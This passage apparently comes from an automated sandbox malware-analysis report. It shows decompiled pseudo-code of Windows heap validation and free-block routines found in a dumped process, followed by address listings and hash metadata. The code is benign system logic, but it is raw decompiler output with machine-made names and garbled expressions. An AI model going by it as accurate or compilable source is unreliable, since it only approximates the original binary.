									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E0166B150();
									} else {
										E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E0166B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E0166B150();
								} else {
									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E0166B150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E0166B150();
							} else {
								E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E01724AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0171FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E017123E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                    0x017244a1
                    0x017244a3
                    0x017244a7
                    0x017244ac
                    0x017244af
                    0x017244b2
                    0x017244b9
                    0x017244bc
                    0x017247f2
                    0x017247f2
                    0x017247f8
                    0x017247fc
                    0x017247fe
                    0x01724804
                    0x01724805
                    0x01724805
                    0x0172480c
                    0x01724810
                    0x01724812
                    0x01724812
                    0x01724812
                    0x01724822
                    0x01724822
                    0x01724827
                    0x01724827
                    0x00000000
                    0x01724827
                    0x017244c4
                    0x017244d3
                    0x017244d9
                    0x017244dc
                    0x017244de
                    0x017244e0
                    0x01724560
                    0x01724520
                    0x01724522
                    0x01724525
                    0x01724528
                    0x0172452b
                    0x0172452e
                    0x01724530
                    0x01724697
                    0x0172469d
                    0x017246a1
                    0x017246c0
                    0x017246c5
                    0x017246a3
                    0x017246b8
                    0x017246bd
                    0x017246cb
                    0x017246d4
                    0x01724677
                    0x01724677
                    0x01724679
                    0x0172467c
                    0x0172468a
                    0x01724690
                    0x01724690
                    0x017247f1
                    0x017247f1
                    0x017247f1
                    0x00000000
                    0x017247f1
                    0x01724536
                    0x01724539
                    0x0172453c
                    0x01724636
                    0x0172463c
                    0x01724640
                    0x0172465f
                    0x01724664
                    0x01724642
                    0x01724657
                    0x0172465c
                    0x01724670
                    0x00000000
                    0x01724542
                    0x01724542
                    0x01724546
                    0x01724548
                    0x0172454b
                    0x01724555
                    0x0172455b
                    0x0172455b
                    0x0172455b
                    0x0172455d
                    0x0172455d
                    0x0172455d
                    0x00000000
                    0x0172455d
                    0x0172453c
                    0x01724579
                    0x0172457c
                    0x01724587
                    0x01724589
                    0x01724591
                    0x01724592
                    0x01724597
                    0x01724598
                    0x017245a1
                    0x017245ab
                    0x017245ab
                    0x017245a1
                    0x017245ae
                    0x017245b4
                    0x017245b9
                    0x017245bd
                    0x01724759
                    0x01724759
                    0x0172475f
                    0x01724761
                    0x01724763
                    0x01724765
                    0x01724768
                    0x0172476b
                    0x0172476d
                    0x0172479c
                    0x0172479c
                    0x0172479f
                    0x017247a2
                    0x017247a4
                    0x01724830
                    0x01724833
                    0x01724879
                    0x0172487d
                    0x017248f1
                    0x017248f3
                    0x017248f3
                    0x00000000
                    0x017248f3
                    0x0172487f
                    0x01724885
                    0x01724887
                    0x017248a8
                    0x017248a8
                    0x017248ae
                    0x017248b0
                    0x017248dc
                    0x017248dc
                    0x017248dc
                    0x017248dc
                    0x017248ec
                    0x00000000
                    0x017248ec
                    0x017248b2
                    0x017248bc
                    0x017248be
                    0x017248c1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x017248c3
                    0x017248c3
                    0x017248c6
                    0x017248c9
                    0x017248cc
                    0x017248d1
                    0x017248d4
                    0x00000000
                    0x00000000
                    0x017248d6
                    0x017248d7
                    0x017248da
                    0x00000000
                    0x00000000
                    0x00000000
                    0x017248da
                    0x0172494f
                    0x01724955
                    0x01724959
                    0x01724978
                    0x0172497d
                    0x0172495b
                    0x01724970
                    0x01724975
                    0x01724986
                    0x01724987
                    0x0172498a
                    0x0172498d
                    0x01724997
                    0x017247ef
                    0x017247ef
                    0x017247ef
                    0x00000000
                    0x017247ef
                    0x01724890
                    0x01724890
                    0x01724891
                    0x01724891
                    0x01724894
                    0x01724897
                    0x0172489d
                    0x017248a0
                    0x00000000
                    0x00000000
                    0x017248a2
                    0x017248a3
                    0x017248a6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x017248a6
                    0x017248fb
                    0x01724901
                    0x01724905
                    0x01724924
                    0x01724929
                    0x01724907
                    0x0172491c
                    0x01724921
                    0x0172492f
                    0x01724935
                    0x01724936
                    0x01724939
                    0x01724942
                    0x00000000
                    0x01724947
                    0x01724835
                    0x0172483b
                    0x0172483f
                    0x0172485e
                    0x01724863
                    0x01724841
                    0x01724856
                    0x0172485b
                    0x01724869
                    0x0172486c
                    0x0172486f
                    0x017247e7
                    0x017247e7
                    0x00000000
                    0x017247ec
                    0x017247aa
                    0x017247b0
                    0x017247b4
                    0x017247d3
                    0x017247d8
                    0x017247b6
                    0x017247cb
                    0x017247d0
                    0x017247de
                    0x017247df
                    0x017247e2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0172476f
                    0x0172476f
                    0x01724778
                    0x01724785
                    0x01724787
                    0x0172478c
                    0x0172478e
                    0x00000000
                    0x00000000
                    0x01724790
                    0x01724792
                    0x01724794
                    0x00000000
                    0x00000000
                    0x01724796
                    0x01724799
                    0x00000000
                    0x01724799
                    0x00000000
                    0x017245c3
                    0x017245c3
                    0x017245c7
                    0x017245c7
                    0x017245ca
                    0x017245cf
                    0x017245d3
                    0x017245df
                    0x017245e4
                    0x017245e6
                    0x017245e8
                    0x017245ed
                    0x017245ed
                    0x017245f2
                    0x017245f2
                    0x017245f7
                    0x017245fc
                    0x01724602
                    0x01724606
                    0x01724609
                    0x0172460f
                    0x017246de
                    0x017246e3
                    0x017246e5
                    0x017246ec
                    0x017246ee
                    0x017246f6
                    0x017246f6
                    0x017246f6
                    0x017246f6
                    0x017246ec
                    0x01724615
                    0x01724615
                    0x0172461d
                    0x0172462e
                    0x0172462e
                    0x0172461d
                    0x0172460f
                    0x01724609
                    0x017246fd
                    0x00000000
                    0x00000000
                    0x01724710
                    0x0172471a
                    0x01724720
                    0x01724720
                    0x01724722
                    0x0172472c
                    0x00000000
                    0x0172472e
                    0x0172472e
                    0x00000000
                    0x0172472e
                    0x0172472c
                    0x01724738
                    0x0172473c
                    0x0172474b
                    0x01724751
                    0x01724751
                    0x00000000
                    0x0172473c
                    0x017248f4
                    0x017248f4
                    0x00000000
                    0x017248f4

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                    • API String ID: 0-1357697941
                    • Opcode ID: 1e031b0e495d3cfcbc8157902f011f251988915490c65cf8774cfad7c1677b31
                    • Instruction ID: 9e9ea514b39c91e0d41da0c8bcf608b3ede9c1bc95c1435eec36e73a13daf789
                    • Opcode Fuzzy Hash: 1e031b0e495d3cfcbc8157902f011f251988915490c65cf8774cfad7c1677b31
                    • Instruction Fuzzy Hash: 84F13132610666EFDB25CF69C884BBAFBF6FF09304F148059E5879B641C770A986CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0168A309 Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 72%
                    			E0168A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x1758a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E0168A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E0168DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E01669373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E0166A9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x1758748 - 1;
						if( *0x1758748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E0166B150();
								} else {
									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E0166B150();
								__eflags =  *0x1757bc8;
								if( *0x1757bc8 == 0) {
									__eflags = 1;
									E01722073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x1758748 - 1;
							if( *0x1758748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E0169174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E01687D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E017214FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E01669373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E01669819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x1758748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E0166B150();
											} else {
												E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E0166B150();
											_pop(_t491);
											__eflags =  *0x1757bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E01722073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E0172A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E0168A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E01687D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E01687D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E01721411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E01687D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E01687D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x1758748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E0166B150();
							} else {
								E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E0166B150();
							__eflags =  *0x1757bc8;
							if( *0x1757bc8 == 0) {
								__eflags = 0;
								E01722073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x1758748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E0166B150();
												} else {
													E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E0166B150();
												__eflags =  *0x1757bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E01722073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0172A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E0168A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E0168B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E0168A830(_t553, _v64, _v24);
								_t286 = E01687D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E01687D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01721411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E01687D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E01687D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E01721411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E0169174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E0168B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E01687D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E017214FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E016899BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E0168A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E0169ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                    0x0168a309
                    0x0168a316
                    0x0168a319
                    0x0168a31d
                    0x0168a32d
                    0x0168a331
                    0x016d1e0d
                    0x016d1e10
                    0x0168a3cb
                    0x0168a3cb
                    0x0168a3bd
                    0x0168a3c3
                    0x0168a3c3
                    0x0168a33a
                    0x016d1e17
                    0x016d1e1b
                    0x016d1e1d
                    0x016d1e2f
